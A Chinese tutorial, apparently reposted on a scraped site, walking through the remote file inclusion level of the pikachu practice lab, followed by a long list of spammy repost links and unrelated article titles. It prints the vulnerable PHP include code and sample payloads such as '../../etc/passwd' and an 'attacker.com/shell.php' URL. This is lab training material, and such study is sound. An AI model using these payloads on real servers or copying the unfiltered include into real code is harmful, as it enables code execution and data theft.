当前位置: 首页 > news >正文 网站平台建设保密协议网页设计与制作大全 news 2025/10/28 5:05:51 网站平台建设保密协议,网页设计与制作大全,wordpress设定路径,装饰公司网站php源码目录 一、文件包含功能 二、文件包含Vulnerability 二、远程文件包含 三、环境配置 1、进入靶场 2、搭建环境 #xff08;1#xff09;定位php.ini文件 #xff08;2#xff09;修改php.ini文件 四、源码分析 五、渗透实战 1、选择科比 2、执行phpinfo …目录 一、文件包含功能 二、文件包含Vulnerability 二、远程文件包含 三、环境配置 1、进入靶场 2、搭建环境 1定位php.ini文件 2修改php.ini文件 四、源码分析 五、渗透实战 1、选择科比 2、执行phpinfo 1获取脚本地址 2远程文件包含渗透 本系列为《pikachu靶场通关笔记》渗透实战本文通过对文件包含关卡File Inclusion)源码的代码审计找到产生缺陷的真实原因讲解远程文件包含关卡的原理并进行渗透实践。 一、文件包含功能 文件包含是Web开发中常用的功能允许程序动态加载外部文件如HTML模板、配置文件或代码库以提高代码复用性。在PHP中主要通过以下函数实现 include包含文件失败时警告但继续执行。 require包含文件失败时终止程序。 include_once/require_once避免重复包含。 二、文件包含Vulnerability 文件包含VulnerabilityFile Inclusion Vulnerability是指Web应用程序在包含文件如PHP的include、require等函数时未对用户输入进行严格过滤导致攻击者可以包含恶意文件如服务器上的敏感文件或远程脚本从而造成任意代码执行RCE或敏感信息泄露。 开发者常常会使用文件包含函数像 PHP 的include()、require()、include_once()、require_once()等把其他文件内容包含到当前页面中。若程序没有对用户输入的文件路径进行严格过滤与验证攻击者就能够通过构造特殊的输入让应用程序包含恶意文件。 二、远程文件包含 远程文件包含Remote File InclusionRFI通常出现在服务器端脚本语言如PHP、Java等中。当应用程序通过用户输入动态地包含远程服务器上的文件时如果没有对输入进行严格过滤和验证攻击者可以利用远程文件包含缺陷将恶意文件放置在远程服务器上并通过构造包含恶意文件URL的请求让目标应用程序加载并执行该文件。 文件包含分为本地文件包含和远程文件包含两者区别如下所示。 对比项本地文件包含LFI远程文件包含RFI定义包含服务器本地的任意文件包含远程服务器上的恶意脚本文件攻击目标读取敏感文件如/etc/passwd、配置文件直接执行远程恶意代码如WebShell利用方式通过../等遍历目录通过URL包含http://或ftp://远程资源PHP配置要求无需特殊配置需allow_url_includeOn默认关闭危害等级中高危信息泄露严重直接RCE服务器沦陷典型攻击载荷?file../../etc/passwd?filehttp://attacker.com/shell.php依赖条件文件路径可控1. 路径可控 2. 服务器能访问外网常见防御措施1. 白名单限制文件路径 2. 禁用目录遍历符号1. 关闭allow_url_include 2. 过滤http://等协议渗透测试用途1. 窃取配置文件 2. 结合日志注入执行代码1. 直接获取服务器权限 2. 植入后门伪协议利用支持如php://filter读取文件内容支持如php://input直接执行POST代码 三、环境配置 1、进入靶场 进入pikachu靶场的远程文件包含关卡完整URL地址如下所示。 http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php 进入到远程包含关卡页面后发现提示“warning:你的allow_url_include没有打开,请在php.ini中打开了再测试该关卡,记得修改后,重启中间件服务!”需要配置环境满足条件具体如下所示。 2、搭建环境 将php.ini文件里的allow_url_include改成On远程文件包含的前提是需要满足如下条件。 allow_url_fopenOn (默认打开) allow_url_includeOn默认关闭所以要手动改为On 1定位php.ini文件 方法1①打开小皮工具依次点击设置—配置文件—php.ini—php版本号 方法2②找到小皮工具文件夹—Extensions—php—php版本号—php.ini 2修改php.ini文件 按照下图查找并修改php.ini文件开启allow_url_include和allow_url_fopen切记修改之后重启小皮apache否则不生效。 四、源码分析 打开piakchu靶场的源码目录找到file_remote.php具体如下所示。 源码的主要功能是动态包含服务器本地或远程文件经过详细注释的源码如下所示。 // 远程文件包含风险的演示代码 $html ; // 初始化HTML输出变量// 检查是否提交了表单且filename参数不为空 if (isset($_GET[submit]) $_GET[filename] ! null) {$filename $_GET[filename]; // 直接获取用户输入的filename参数include $filename; // 关键点直接包含用户可控的变量无任何过滤 } 不过这段代码有文件包含安全风险如果allow_url_includeOn配置打开还有远程包含安全风险原因如下所示。 原因具体问题未过滤用户输入直接使用$_GET[filename]攻击者可注入恶意路径。危险函数调用include直接执行文件内容若包含PHP文件会解析代码。配置依赖需php.ini中开启allow_url_includeOn默认关闭否则仅能本地文件包含LFI。 五、渗透实战 1、选择科比 重启Apache后重试pikachu靶场远程文件上传选择科比留意当前URL地址具体如下所示。 http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php# 此时进入到远程文件包含页面已无3.1部分的警告信息具体如下所示。 选择第一个运动员科比留意URL地址此时filename被赋值为filenameinclude%2Ffile1.php具体如下所示。 http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filenameinclude%2Ffile1.phpsubmit%E6%8F%90%E4%BA%A4 2、执行phpinfo 1获取脚本地址 在pikachu靶场的test目录中存在phpinfo.txt文件其完整的URL地址如下所示。 http://127.0.0.1/pikachu/test/phpinfo.txt 2远程文件包含渗透 将5.1部分的filenameinclude/file1.php换成phpinfo的链接地址具体如下所示。 filenamehttp://127.0.0.1/pikachu/test/phpinfo.txt 这样远程文件包含渗透的完整URL地址如下所示。 http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filenamehttp://127.0.0.1/pikachu/test/phpinfo.txtsubmit%E6%8F%90%E4%BA%A4 如下所示成功获取到服务器的php信息渗透成功。 文章转载自: http://www.morning.nkkpp.cn.gov.cn.nkkpp.cn http://www.morning.tsmxh.cn.gov.cn.tsmxh.cn http://www.morning.ynwdk.cn.gov.cn.ynwdk.cn http://www.morning.fjzlh.cn.gov.cn.fjzlh.cn http://www.morning.pfnrj.cn.gov.cn.pfnrj.cn http://www.morning.wnwjf.cn.gov.cn.wnwjf.cn http://www.morning.zcsch.cn.gov.cn.zcsch.cn http://www.morning.ykrkq.cn.gov.cn.ykrkq.cn http://www.morning.c7622.cn.gov.cn.c7622.cn http://www.morning.yccnj.cn.gov.cn.yccnj.cn http://www.morning.tgpgx.cn.gov.cn.tgpgx.cn http://www.morning.hnrqn.cn.gov.cn.hnrqn.cn http://www.morning.zxdhp.cn.gov.cn.zxdhp.cn http://www.morning.dmwjl.cn.gov.cn.dmwjl.cn http://www.morning.wttzp.cn.gov.cn.wttzp.cn http://www.morning.xmyrn.cn.gov.cn.xmyrn.cn http://www.morning.lflnb.cn.gov.cn.lflnb.cn http://www.morning.zsrjn.cn.gov.cn.zsrjn.cn http://www.morning.eshixi.com.gov.cn.eshixi.com http://www.morning.zntf.cn.gov.cn.zntf.cn http://www.morning.fnmgr.cn.gov.cn.fnmgr.cn http://www.morning.qpqwb.cn.gov.cn.qpqwb.cn http://www.morning.lclpj.cn.gov.cn.lclpj.cn http://www.morning.jqswf.cn.gov.cn.jqswf.cn http://www.morning.tjjkn.cn.gov.cn.tjjkn.cn http://www.morning.fjptn.cn.gov.cn.fjptn.cn http://www.morning.qqnp.cn.gov.cn.qqnp.cn http://www.morning.duqianw.com.gov.cn.duqianw.com http://www.morning.fblkr.cn.gov.cn.fblkr.cn http://www.morning.bbrf.cn.gov.cn.bbrf.cn http://www.morning.wqbhx.cn.gov.cn.wqbhx.cn http://www.morning.hyhqd.cn.gov.cn.hyhqd.cn http://www.morning.gwjnm.cn.gov.cn.gwjnm.cn http://www.morning.xkzmz.cn.gov.cn.xkzmz.cn http://www.morning.xzgbj.cn.gov.cn.xzgbj.cn http://www.morning.ldpjm.cn.gov.cn.ldpjm.cn http://www.morning.gwqcr.cn.gov.cn.gwqcr.cn http://www.morning.rftk.cn.gov.cn.rftk.cn http://www.morning.grfhd.cn.gov.cn.grfhd.cn http://www.morning.ljglc.cn.gov.cn.ljglc.cn http://www.morning.slfmp.cn.gov.cn.slfmp.cn http://www.morning.crqpl.cn.gov.cn.crqpl.cn http://www.morning.kkqgf.cn.gov.cn.kkqgf.cn http://www.morning.jpbky.cn.gov.cn.jpbky.cn http://www.morning.dmcxh.cn.gov.cn.dmcxh.cn http://www.morning.smhtg.cn.gov.cn.smhtg.cn http://www.morning.ktmnq.cn.gov.cn.ktmnq.cn http://www.morning.hphqy.cn.gov.cn.hphqy.cn http://www.morning.mypxm.com.gov.cn.mypxm.com http://www.morning.njnqn.cn.gov.cn.njnqn.cn http://www.morning.mkrjf.cn.gov.cn.mkrjf.cn http://www.morning.xdxpq.cn.gov.cn.xdxpq.cn http://www.morning.llllcc.com.gov.cn.llllcc.com http://www.morning.thbqp.cn.gov.cn.thbqp.cn http://www.morning.bybhj.cn.gov.cn.bybhj.cn http://www.morning.bgpb.cn.gov.cn.bgpb.cn http://www.morning.yzygj.cn.gov.cn.yzygj.cn http://www.morning.mqxrx.cn.gov.cn.mqxrx.cn http://www.morning.yslfn.cn.gov.cn.yslfn.cn http://www.morning.xrwbc.cn.gov.cn.xrwbc.cn http://www.morning.ymhzd.cn.gov.cn.ymhzd.cn http://www.morning.zlhbg.cn.gov.cn.zlhbg.cn http://www.morning.chongzhanggui.cn.gov.cn.chongzhanggui.cn http://www.morning.ltpmy.cn.gov.cn.ltpmy.cn http://www.morning.rjxwq.cn.gov.cn.rjxwq.cn http://www.morning.clbgy.cn.gov.cn.clbgy.cn http://www.morning.lmqw.cn.gov.cn.lmqw.cn http://www.morning.pgmyn.cn.gov.cn.pgmyn.cn http://www.morning.nhgkm.cn.gov.cn.nhgkm.cn http://www.morning.tzzfy.cn.gov.cn.tzzfy.cn http://www.morning.yzygj.cn.gov.cn.yzygj.cn http://www.morning.tqwcm.cn.gov.cn.tqwcm.cn http://www.morning.wfpmt.cn.gov.cn.wfpmt.cn http://www.morning.ggjlm.cn.gov.cn.ggjlm.cn http://www.morning.wbns.cn.gov.cn.wbns.cn http://www.morning.hwhnx.cn.gov.cn.hwhnx.cn http://www.morning.zmwd.cn.gov.cn.zmwd.cn http://www.morning.nbhft.cn.gov.cn.nbhft.cn http://www.morning.spwln.cn.gov.cn.spwln.cn http://www.morning.hsrpc.cn.gov.cn.hsrpc.cn 查看全文 http://www.tj-hxxt.cn/news/255784.html 相关文章: 上海人才招聘官网随州seo搜索引擎优化排名 phpcms手机网站模板网站建设平台 汉龙 网站被降权了怎么办建网站莱阳哪家强? 58同城类型网站制作免费咨询法律援助电话号码 免费制作一个自己的网站吗哪有网页设计公司 怎么做网站弹幕效果网站做自适应 织梦生成网站地图贵州网站建设工作室 红河做网站中网的官方网站 网站建设注意哪些注意事项做游戏需要学什么 新河网站快排seowordpress 国内 主题 网站开发支付宝提现天津建设工程评标专家网站 阜宁网站制作价格wordpress怎么添加留言板 做网站带来好处秦皇岛网签查询系统 网络公司网站绪论网站主办者和所有者区别 杭州做网站下沙wordpress 简码 文章图片 如何做美食的视频网站wordpress副标题显示 杨浦企业网站建设太和县住房和城乡建设局网站 建设很行官方网站网站的功能包括哪些内容 网站恶意攻击wordpress发多少文章卡 濮阳网站建设 公司名字石家庄网络推广的优势 影视 网站建设 新媒体百度快照 乡村网站建设徐州市建设工程质监站网站 建立大型网站吗企业网站seo服务 网站哪类业务建设投入会带来间接收益拓者设计吧电脑版 电子商务网站建设调查分析如何做电视剧的短视频网站 怎样设计个人网站长沙短视频制作公司 保定定兴网站建设在深圳注册公司需要什么资料 最方便建立网站centos7系统做网站 中国建设银行网站密码忘了怎么办内部网站开发 买衣服网站排名网站建设对企业的帮助
